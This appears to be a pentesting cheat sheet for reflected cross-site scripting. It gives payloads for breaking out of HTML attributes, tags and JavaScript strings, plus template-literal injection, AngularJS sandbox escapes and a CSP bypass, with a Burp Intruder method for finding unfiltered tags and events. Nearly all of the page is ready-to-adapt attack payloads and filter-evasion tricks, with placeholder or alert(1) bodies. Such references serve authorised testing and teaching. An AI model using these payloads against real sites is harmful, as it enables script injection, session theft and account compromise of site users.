Reflected
Context
AccessKey Attribute
Set a global accessKey parameter. When the user presses the selected key, a script will be executed. Works only on Chrome
<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)HTML Parameter
"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">
//in case brackets are escaped, give onfocus event and focus on self
" autofocus onfocus="..." x="
" onmouseover="..." x="Anchor href parameter poisoning
href="javascript:'...'"HTML Tags
Find vulnerable field
Send request to Burp Intruder as following
<§[payload]§>to find unfiltered tagsSet the payload to a list of tags (see here) and start the attack
After finding an unfiltered tag set the payload to
<[tag]+§[payload]§="alert()">Set the payload to a list of events (see here) and start the attack
After finding a suitable event the basic payload will be
<[tag]+[event]="[js]">
Deliver through IFrame
<iframe src="<url>" onload="...">Deliver with custom tag with autofocus
<script>
location = "<url>/?search=<xss id='x' onfocus='...' tabindex=1>#x";
</script>Javascript Block
Escape from string such as var x = 'input'
</script><script>...</script>Escape from strings with angled brackets encoded
'-<payload>-'
';<payload>//Evade filters
\';<...>// //double quote filter
onerror=<func>;throw <arg> //assign to error event.
'-<...>-' //HTML escaped quotesJS Template Literals
JS template strings are declared between backticks and use ${...} notation to evaluate code and inject the result in the string.
`Welcome, ${user.displayName}.`;To execute code simply inject ${<...>} in the string
AngularJS Sandbox Escape
Sandbox escape by owerwriting the charAt method to join characters instead of evaluoating them one at a time
toString().constructor.prototype.charAt%3d[].join;Code execution payloads
$eval('x=<...>')
[1]|orderBy:toString().constructor.fromCharCode(120 61 <charcode payload>)=1 //120 61 is for 'x='Content Security Policy Bypass
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],<...>)'">Last updated